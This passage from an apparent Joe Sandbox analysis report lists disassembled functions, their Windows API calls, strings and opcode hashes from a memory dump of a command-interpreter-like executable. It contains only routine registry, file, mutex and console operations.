                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: iswdigit
                                                      • String ID: GeToken: (%x) '%s'
                                                      • API String ID: 3849470556-1994581435
                                                      • Opcode ID: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                      • Instruction ID: ef0f9b7468addac1b581678e2efafe17ec889b006855f62f62317c29478df060
                                                      • Opcode Fuzzy Hash: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                      • Instruction Fuzzy Hash: A0517B31A0864295EB24EF16E446779B7A4FF44B55F848537DA4E43390DFBCE880C362
                                                      Function 00007FF7E1DD992C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 121registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7E1DD9A10
                                                      • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7E1DD9994
                                                        • Part of subcall function 00007FF7E1DDA73C: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7E1DD9A82), ref: 00007FF7E1DDA77A
                                                        • Part of subcall function 00007FF7E1DDA73C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7E1DD9A82), ref: 00007FF7E1DDA839
                                                        • Part of subcall function 00007FF7E1DDA73C: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7E1DD9A82), ref: 00007FF7E1DDA850
                                                      • wcsrchr.MSVCRT ref: 00007FF7E1DD9A62
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$CloseEnumOpenwcsrchr
                                                      • String ID: %s=%s$.
                                                      • API String ID: 3242694432-4275322459
                                                      • Opcode ID: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                                      • Instruction ID: bc49e8965bf550e9a02cc87c6850378a5aff17badfe04ae1e25f074eab442781
                                                      • Opcode Fuzzy Hash: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                                      • Instruction Fuzzy Hash: 3F41C222A0D74295EF18FB1190523BAE290FF897A0FC45232DD5E073D5EEBDE4418322
                                                      Function 00007FF7E1DD54B0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 120synchronizationCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7E1DD54E6
                                                      • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7E1DD552E
                                                        • Part of subcall function 00007FF7E1DD758C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF7E1DD6999,?,?,?,?,?,00007FF7E1DC8C39), ref: 00007FF7E1DD75AE
                                                        • Part of subcall function 00007FF7E1DD758C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF7E1DD6999,?,?,?,?,?,00007FF7E1DC8C39), ref: 00007FF7E1DD75C6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$CreateCurrentMutexProcess
                                                      • String ID: Local\SM0:%d:%d:%hs$wil$x
                                                      • API String ID: 779401067-630742106
                                                      • Opcode ID: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                      • Instruction ID: eefed58934d1d8032b974671085af9a1a1e3a17537fb000ee832680d78987edb
                                                      • Opcode Fuzzy Hash: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                      • Instruction Fuzzy Hash: 3051B772A1868281EB21EF15E4027FAE360EF84784FC04133EA0E8BA55DEBDE445C761
                                                      Function 00007FF7E1DC417C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectorytowupper
                                                      • String ID: :$:
                                                      • API String ID: 238703822-3780739392
                                                      • Opcode ID: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                      • Instruction ID: 003be5ed11d1cb1b1f2cc3daab100fc6756351b570938a77c30e6c8f027ad810
                                                      • Opcode Fuzzy Hash: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                      • Instruction Fuzzy Hash: 12113852A0864181EB15EB22A402339FAA0EF89799F858133DD4D47754DF7CD041C726
                                                      Function 00007FF7E1DB58D4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                                      • API String ID: 3677997916-3870813718
                                                      • Opcode ID: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                      • Instruction ID: 9a5decf9dba5290fedfdfbf09479201d4a6d2545ca0ee0a01ed752d5667307b6
                                                      • Opcode Fuzzy Hash: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                      • Instruction Fuzzy Hash: FB114C72A18B42D7EB10DB10E44176AF7A0FB8A765F804236DA8D42768DFBCC048CB11
                                                      Function 00007FF7E1DB4C18 Relevance: 7.7, APIs: 5, Instructions: 164COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memsetwcsrchr$wcschr
                                                      • String ID:
                                                      • API String ID: 110935159-0
                                                      • Opcode ID: c69a388bc8b3a3ff16e2786c96b1100a2dbfc28b8c9e9179231870a23454a700
                                                      • Instruction ID: 040a50a0a5c66b2e999c9f2bba8a6a8657fcb0f16ba9370d62d295ff42e66bec
                                                      • Opcode Fuzzy Hash: c69a388bc8b3a3ff16e2786c96b1100a2dbfc28b8c9e9179231870a23454a700
                                                      • Instruction Fuzzy Hash: CC51C422B0978295FF21EB1599067F9E390BF49BA4F894632CE5F0B784DFBCE5418211
                                                      Function 00007FF7E1DC5EE4 Relevance: 7.6, APIs: 5, Instructions: 146COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$CurrentDirectorytowupper
                                                      • String ID:
                                                      • API String ID: 1403193329-0
                                                      • Opcode ID: 8d3f1f6d42ab2b17ec89b1c571636d09bda29dc00517b4cae09e24a64d59b58f
                                                      • Instruction ID: 0191cd607eac79fb79357e27efade4a43282e9af67022759020de1ac636cb0e9
                                                      • Opcode Fuzzy Hash: 8d3f1f6d42ab2b17ec89b1c571636d09bda29dc00517b4cae09e24a64d59b58f
                                                      • Instruction Fuzzy Hash: 4651C226A0569285EB24EF20D8027F9B7B0FF48B48F858936CA1D47394EFBCE545C361
                                                      Function 00007FF7E1DB91C0 Relevance: 7.6, APIs: 5, Instructions: 138COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • memset.MSVCRT ref: 00007FF7E1DB921C
                                                      • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7E1DB93AA
                                                        • Part of subcall function 00007FF7E1DB8B20: wcsrchr.MSVCRT ref: 00007FF7E1DB8BAB
                                                        • Part of subcall function 00007FF7E1DB8B20: _wcsicmp.MSVCRT ref: 00007FF7E1DB8BD4
                                                        • Part of subcall function 00007FF7E1DB8B20: _wcsicmp.MSVCRT ref: 00007FF7E1DB8BF2
                                                        • Part of subcall function 00007FF7E1DB8B20: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DB8C16
                                                        • Part of subcall function 00007FF7E1DB8B20: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7E1DB8C2F
                                                        • Part of subcall function 00007FF7E1DB8B20: wcschr.MSVCRT ref: 00007FF7E1DB8CB3
                                                        • Part of subcall function 00007FF7E1DC417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7E1DC41AD
                                                        • Part of subcall function 00007FF7E1DC3060: SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF7E1DB92AC), ref: 00007FF7E1DC30CA
                                                        • Part of subcall function 00007FF7E1DC3060: SetErrorMode.KERNELBASE ref: 00007FF7E1DC30DD
                                                        • Part of subcall function 00007FF7E1DC3060: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DC30F6
                                                        • Part of subcall function 00007FF7E1DC3060: SetErrorMode.KERNELBASE ref: 00007FF7E1DC3106
                                                      • wcsrchr.MSVCRT ref: 00007FF7E1DB92D8
                                                      • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DB9362
                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7E1DB9373
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Error$Mode$AttributesFileLast_wcsicmpmemsetwcsrchr$CurrentDirectoryFullNamePathwcschr
                                                      • String ID:
                                                      • API String ID: 3966000956-0
                                                      • Opcode ID: 183dd49cd64c4b512f254b2111cbb7598a172917c7dc1c37f5ad0fa1295e0e26
                                                      • Instruction ID: 5c5c534c9a06146f93154c6f5c88e4c74f33e65d583395a6f905eb6d2ab6d8da
                                                      • Opcode Fuzzy Hash: 183dd49cd64c4b512f254b2111cbb7598a172917c7dc1c37f5ad0fa1295e0e26
                                                      • Instruction Fuzzy Hash: 5851E532A0968295EB25EF21D8527B9B3A0FF49B84F845032DA4F07794DF7CE551C311
                                                      Function 00007FF7E1DB2A30 Relevance: 7.6, APIs: 5, Instructions: 119COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$_setjmp
                                                      • String ID:
                                                      • API String ID: 3883041866-0
                                                      • Opcode ID: ecc4c4b8fdff3fe7128d071ff51470f6781c2868d41e5204ec9995c2413b862b
                                                      • Instruction ID: edd92022448a722bfc72fbebdf1e760168878d522278d93026a3710a40b7b14e
                                                      • Opcode Fuzzy Hash: ecc4c4b8fdff3fe7128d071ff51470f6781c2868d41e5204ec9995c2413b862b
                                                      • Instruction Fuzzy Hash: BD51A632A08BC69AEB61DF21D8413E9B7A4FB49748F804136DA4D4BB48DF7CE644C711
                                                      Function 00007FF7E1DBB49C Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 106COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _wcsicmp.MSVCRT ref: 00007FF7E1DBB4BD
                                                        • Part of subcall function 00007FF7E1DC06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DBB4DB), ref: 00007FF7E1DC06D6
                                                        • Part of subcall function 00007FF7E1DC06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DBB4DB), ref: 00007FF7E1DC06F0
                                                        • Part of subcall function 00007FF7E1DC06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DBB4DB), ref: 00007FF7E1DC074D
                                                        • Part of subcall function 00007FF7E1DC06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DBB4DB), ref: 00007FF7E1DC0762
                                                      • _wcsicmp.MSVCRT ref: 00007FF7E1DBB518
                                                      • _wcsicmp.MSVCRT ref: 00007FF7E1DBB58B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$_wcsicmp$AllocProcess
                                                      • String ID: ELSE$IF/?
                                                      • API String ID: 3223794493-1134991328
                                                      • Opcode ID: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                      • Instruction ID: 8b8d8bca25fa2ae0cb5ac529f9d665a4164f31c7b350d6549ecfafdd3ac3bc24
                                                      • Opcode Fuzzy Hash: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                      • Instruction Fuzzy Hash: B6413421E0964292FB55FB24A4537B9A6A5BF44744FC8843BD64F47296DEBCE800C363
                                                      Function 00007FF7E1DDE3E8 Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$File_get_osfhandle$PointerReadlongjmp
                                                      • String ID:
                                                      • API String ID: 1532185241-0
                                                      • Opcode ID: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                      • Instruction ID: b6f2629202a59fe8f1f1addfa290d3592b4530e7f65acd2863a50fc256592a8c
                                                      • Opcode Fuzzy Hash: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                      • Instruction Fuzzy Hash: E441E332A047518BE754EB21D44277DFBA1FB88B80F85863AEA0A47785CF7CE841CB11
                                                      Function 00007FF7E1DB4FE8 Relevance: 7.6, APIs: 5, Instructions: 102fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                                      • String ID:
                                                      • API String ID: 3588551418-0
                                                      • Opcode ID: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                      • Instruction ID: 7af5f27f63665c273c834be099fb597d523c44815d1dfd7fb8e0be85c12e58c1
                                                      • Opcode Fuzzy Hash: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                      • Instruction Fuzzy Hash: 4841B071E086429BE724EB11E44277DF661FF85B81F94813ADA0E47795CEBCE8408B62
                                                      Function 00007FF7E1DDE558 Relevance: 7.6, APIs: 5, Instructions: 100COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: ErrorModememset$FullNamePath_wcsicmp
                                                      • String ID:
                                                      • API String ID: 2123716050-0
                                                      • Opcode ID: bbaf5dedd0cbdd4485c46577773df657aecb1a5bcd9d4c4f0a46f38ce4e38573
                                                      • Instruction ID: 2682f37d00c89ed92821bad49e4847d219494f480498ac464faeb65728dc0e86
                                                      • Opcode Fuzzy Hash: bbaf5dedd0cbdd4485c46577773df657aecb1a5bcd9d4c4f0a46f38ce4e38573
                                                      • Instruction Fuzzy Hash: 1D41B132705BC28AEB35DF25D8413F9A794FB49B88F844135DA4D4AA98EF7CE244C351
                                                      Function 00007FF7E1DB65F8 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Console$Window_get_osfhandle$InitializeModeUninitializememset
                                                      • String ID:
                                                      • API String ID: 3114114779-0
                                                      • Opcode ID: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                                      • Instruction ID: 08ba840b93f9f81222026dcd9b03dc040855f0aa22c75cfc6daf96a6a06bd750
                                                      • Opcode Fuzzy Hash: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                                      • Instruction Fuzzy Hash: 52416832A05B429AEB00EF75D4413ACB7A5FB88748F914036EE0E93B94DF78E406C761
                                                      Function 00007FF7E1DDA73C Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                      Download Yara Rule
                                                      APIs
